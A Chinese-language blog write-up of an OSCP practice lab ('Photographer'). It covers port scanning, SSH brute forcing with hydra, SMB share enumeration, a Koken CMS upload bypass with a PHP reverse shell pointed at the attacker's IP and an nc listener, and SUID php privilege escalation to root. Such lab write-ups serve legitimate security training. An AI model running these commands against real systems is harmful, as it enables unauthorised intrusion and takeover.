freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

从WEB到内网&&信息收集&&SMB枚举&&SUID提权-------打靶经验分享
2023-09-09 16:06:31

OSCP靶机---Photographer

今天来打一个OSCP的靶机,难度中等,包含了端口探测,服务探测,ssh爆破,SMB枚举,文件上传绕过,suid提权等等…靶场难度中等偏高,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境

启动VPN:openvpn universal.ovpn
image.png
攻击机IP为:192.168.45.248
启动靶机:
image.png
靶机IP为: 192.168.152.76

信息收集

1.端口

nmap扫描端口
nmap --min-rate 10000 -p- 192.168.152.76
image.png
靶机开放22,80,139,445,8000了五个端口
详细探测一下端口信息。
image.png
如下

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))

2.端口测试

**2.1 **22-ssh端口
发现开启的22是ssh端口,且版本为OpenSSH 7.2,搜一下有没有对应的脚本:
searchsploit OpenSSH 7.2
image.png
发现有两个用户枚举。待定。
看一下ssh的版本信息
ssh root@192.168.152.76 -v
image.png
发现靶机支持密钥和密码登录。
手工弱口令试一下:
ssh root@192.168.152.76 -p 22
image.png
尝试了几个都没有成功登录,直接用hydra爆破
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.152.76 ssh -s 22
等待ing
image.png
老样子没有爆破出来。

2.280-http
直接访问 192.168.152.76:80
image.png
很精致的页面,应该是有cms,用whatweb看一下具体的cms:
whatweb http://192.168.152.76/
image.png
cms应该是photographer,试着利用一下。
searchsploit Photographer
image.png
好像不是。页面里到处点点看一下有没有功能点,好像也没有,那就扫一下目录:
dirsearch -u http://192.168.152.76/
image.png
有三个,index.html是主页,还有/assets/,/images/,看一下http://192.168.152.76/images/
image.png
是一个目录遍历。都是图片,没什么用。
看一下/assets/
image.png
是网站的css,js,图标等一些东西,还是没有用处。
2.3445-SMB
前面的nmap探测到139和445都是一样的SMB服务。直接测试445端口
利用smbclient看一下SMB的内容。
smbclient -L //192.168.152.76
image.png
空密码直接登上了,值得关注的是sambashare。看一下内容
smbclient //192.168.152.76/sambashare -U root
image.png
一个txt,还有一个WP的备份文件,太大了,下载不了。
查看一下这个txt文件:

get mailsent.txt
cat mailsent.txt

image.png
可能是一个邮件的内容,发件人是agi@photographer.com,收件人daisa@photographer.com看一下翻译
image.png
留言者一个给daisa建了一个站,推测秘密有可能是my babygril,也就是密码。先记下这里的东西。
试一下SMB枚举工具enum4linux抓一下用户名。
enum4linux 192.168.152.76
image.png
WORKGROUP
2.48000--http
http服务老规矩先访问一下:
image.png
巨卡无比,直接curl看看吧
curl http://192.168.152.76:8000
image.png
看不出来什么。
image.png
终于加载进来了,我还以为我VPN挂了。没什么功能点,而且巨卡。看一下cms。
whatweb 192.168.152.76:8000/
image.png
CMS是Koken 0.22.24,搜一下对应的exp
image.png
又任意文件上传,有搞头,看一下详情:
cat /usr/share/exploitdb/exploits/php/webapps/48706.txt
image.png
教程是生成名字为*.php.jpg的木马,然后bp修改成.php就可以成功上传。
image.png
访问一下样本的上传路径,发现是404,去掉第一级有一个api页面:
image.png
要文件上传肯定是要有上传点的,直接扫一下目录吧。
dirsearch -u http://192.168.152.76:8000/ -x 302,403
image.png
挺多,一个一个访问看一下。最终只有这个admin登录页面可以利用
image.png

攻击阶段

登录界面,用户名是邮箱,之前的那个邮件里就有邮箱。
daisa@photographer.com,密码提示可能是my babygril
那就试一试,经过测试,密码是babygril成功登录。
image.png
依据之前收集的信息,这里肯定是一个上传点的,找一下。
image.png
在这里,按照之前exp的提示开始打。
1.启动burp
2.创建一个反弹shell的.php.jpg文件,php用kali自带的webshells
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php.jpg
image.png
3.配置一下shell:

利用grep确定修改反弹shell_ip的第49行
 grep -n "127.0.0.1" shell.php.jpg 
 设置监听端口是第50行
 grep -n "1234" shell.php.jpg
 用sed命令替换里面的内容
 sed -i '49s/127.0.0.1/192.168.45.248/' shell.php.jpg
 sed -i '50s/1234/6666/' shell.php.jpg
 查看49与50行是否修改成功
 sed -n '49,50p' shell.php.jpg

image.png
4.启动nc监听:
nc -lvvp 6666
5.burp进行shell的上传
image.png
image.png
修改两处,发包,抓到重定向的包,找到了上传的位置:
image.png
访问上传的shell
curl http:\/\/192.168.152.76:8000\/storage\/originals\/d2\/eb\/shell.php
image.png
成功弹到shell。

内网渗透

先用python获得新的交互shell
python -c "import pty;pty.spawn('/bin/bash')";
image.png
获取flag1
find / -name local.txt 2>/dev/null
cat /home/daisa/local.txt
image.png

提权

1.内核overlayfs提权
lsb_release -a看看发行版本
image.png
Ubuntu 16.04不行
2.低内核版本提权
uname -a
image.png
内核版本为4.15.0,不行。
3.sudo提权
sudo -l
image.png
要密码,不行。
4.suid提权
find / -perm -u=s -type f 2>/dev/null
image.png
有一个php,去https://gtfobins.github.io 找找。
image.png
image.png
这里是php7.2,那就是
php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
image.png
成功提权。
获取flag2
cat /root/proof.txt
image.png

# 渗透测试 # 网络安全 # web安全 # 内网渗透
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录